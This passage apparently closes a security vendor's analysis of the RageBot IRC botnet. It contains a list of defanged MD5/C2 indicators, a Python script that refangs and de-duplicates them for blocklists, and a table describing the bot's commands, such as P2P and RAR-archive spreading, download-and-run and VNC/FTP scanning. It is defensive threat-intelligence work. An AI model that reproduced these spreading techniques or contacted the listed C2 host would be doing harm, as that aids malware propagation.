Mar-15 309FB15C08861BC063C19C326A29AC98 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 422C1A2BC53F72CAE5435F7F5598BDFD api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 30A6C9DC574075C5EA47F17EA9392C47 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 37A9570400CB0C0CD4E5273AE3232EB5 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 E59BCA5EE865FE5789C96B20A43F9207 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 919C861E6A6ABF88045476D5D92A5DE1 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 5FD98DE177F158C31960BF80272F2535 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 9439AA18598643131B3F8DD9E69AB294 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 F66A06166B73391C4C7A7A58CC6CE66C api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 79589FC33375A63BB44A8DE0B2B5DAF8 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 2C328EF3F2074D68729F329D4B2F8013 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 90E8FF73C7E78B99ABCD1FC22394F22E api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 A3AEC401831AF6EF1C75AFB1C50D96DA api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 42C7C8719D33AFCF36DC7D5D2594EB5B api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 375E51758336183B07CA7DBF771D2EF8 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 FA20E413002E17B938B2451552721027 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 09840FA1887528B20C98C408C8EB6E07 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 6AB2975E77EA4724FADF4CCB7250F0E9 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 51E7E34FFB5EF17FDE5FAFC5DF8F7212 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 F61E3F5ACFE1F861CECEA0A793D4F333 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 229236B39E92E629178419CB8A529E1A api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 D299AD2A61F325F5DA56AE7674D2F77D api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 53CA20232F358A9C256748403451EF14 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 41BE96D1B3BDF9E48D97AE153D6EFD45 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 213E0B42AF7CF1D0DCB75E378CA93512 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
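The rows in this appendix are defanged with [.] and one hash appears twice, so before the list can feed a blocklist it needs parsing, refanging and de-duplication. The Python below is an added example, not ThreatLabZ tooling: the sample rows are copied from the table above (plus one deliberately malformed row), while the function names and the output shape are this example's assumptions. One caveat it makes visible: the hostname's leading labels imitate api1.wipmania.com, but the registrable domain is wipmsc[.]ru, which is what a domain-level block should key on.

```python
import re
from collections import OrderedDict

# Added example: parser for the defanged "Month MD5 URL" rows of the appendix.
# Row format and sample rows are from the page; helper names and output shape are assumptions.
ROW = re.compile(r"^(?P<month>[A-Z][a-z]{2}-\d{2})\s+(?P<md5>[0-9A-Fa-f]{32})\s+(?P<url>\S+)$")


def refang(s):
    """Turn 'api1[.]example[.]com/x' back into a resolvable form for blocklists."""
    return s.replace("[.]", ".").replace("hxxp", "http")


def parse_ioc_lines(text):
    """One dict per well-formed row; malformed rows are returned separately, never guessed at."""
    records, rejected = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ROW.match(line)
        if not m:
            rejected.append(line)
            continue
        url = refang(m.group("url"))
        host, _, path = url.partition("/")
        records.append({
            "month": m.group("month"),
            "md5": m.group("md5").lower(),
            "url": url,
            "host": host,
            "path": "/" + path,
        })
    return records, rejected


def dedupe_by_hash(records):
    """Keep the first row per MD5; the appendix repeats one hash verbatim."""
    seen = OrderedDict()
    for r in records:
        seen.setdefault(r["md5"], r)
    return list(seen.values())


def registrable_domain(host):
    """Last two labels of the host. Assumption: no public-suffix list, so this is only right
    for simple TLDs such as .ru and .com, which is all this appendix contains."""
    labels = host.split(".")
    return ".".join(labels[-2:])


def summarise(text):
    records, rejected = parse_ioc_lines(text)
    unique = dedupe_by_hash(records)
    return {
        "rows": len(records),
        "unique_hashes": sorted(r["md5"] for r in unique),
        "hosts": sorted({r["host"] for r in unique}),
        "domains": sorted({registrable_domain(r["host"]) for r in unique}),
        "rejected": rejected,
    }


# Sample rows copied from the appendix (including its duplicated hash) plus one
# deliberately malformed row to show rejection.
SAMPLE = """
Jan-15 8036A36C372602CFA049996B9F5BD6AE api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 8036A36C372602CFA049996B9F5BD6AE api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 2CBD9428DEE885C30258BF0C38299138 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 ADDF9E2B207AD9E89DB46E81A8121882 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 NOTAHASH api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
"""

if __name__ == "__main__":
    import json
    print(json.dumps(summarise(SAMPLE), indent=2))
```

Feeding the whole appendix through summarise() yields a single host and a single registrable domain for three months of samples, which is the useful network indicator here; the per-sample MD5s are what the endpoint side consumes.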

RageBot Commands

Command – Description
PING – Check status
422 – Check status
433 – Redefine nick name
-s – Silent mode
h 0f6969d7052da9261e31ddb6e88c136e – Uninstall bot
h fd456406745d816a45cae554c788e754 – Download and run file
Botinfo – Sends bot info
p2p – Starts P2P spread; copies itself into the following locations:
    \Program Files\LimeWire\Shared
    \Program Files\eDonkey2000\incoming
    \Program Files\KAZAA
    \Program Files\Morpheus\My Shared Folder\
    \Program Files\BearShare\Shared\
    \Program Files\ICQ\Shared Files\
    \Program Files\Grokster\My Grokster\
    \My Downloads\
commands – Sends the following list of commands:
    commands: botinfo/rarworm/xpl/p2p/vncstop/disconnect/reconnect/nick/restart/part/join/
rarworm – Scans for .rar files and copies itself into .rar archives with the name “self-installer.exe”
disconnect – Disconnects itself
b0tk1ller (off) – Starts a thread that scans the running processes and terminates any process whose name matches a hardcoded list. If the parameter off is provided, it stops the bot-killer thread.
reconnect – Reconnects to the same server
reconnect.next – Same as reconnect, since only one IP is hardcoded in the bot
nick (nickname) – Sets the nick name; if no nickname is provided, generates a random one
restart – Restarts itself
vncstop – Stops the VNC scanning threads
join (channel_name) – Joins the given channel
xpl – Starts the VNC and FTP scanning threads

Analysis by: Amandeep Kumar, Avinash Kumar, Nirmal Singh & Deepen Desai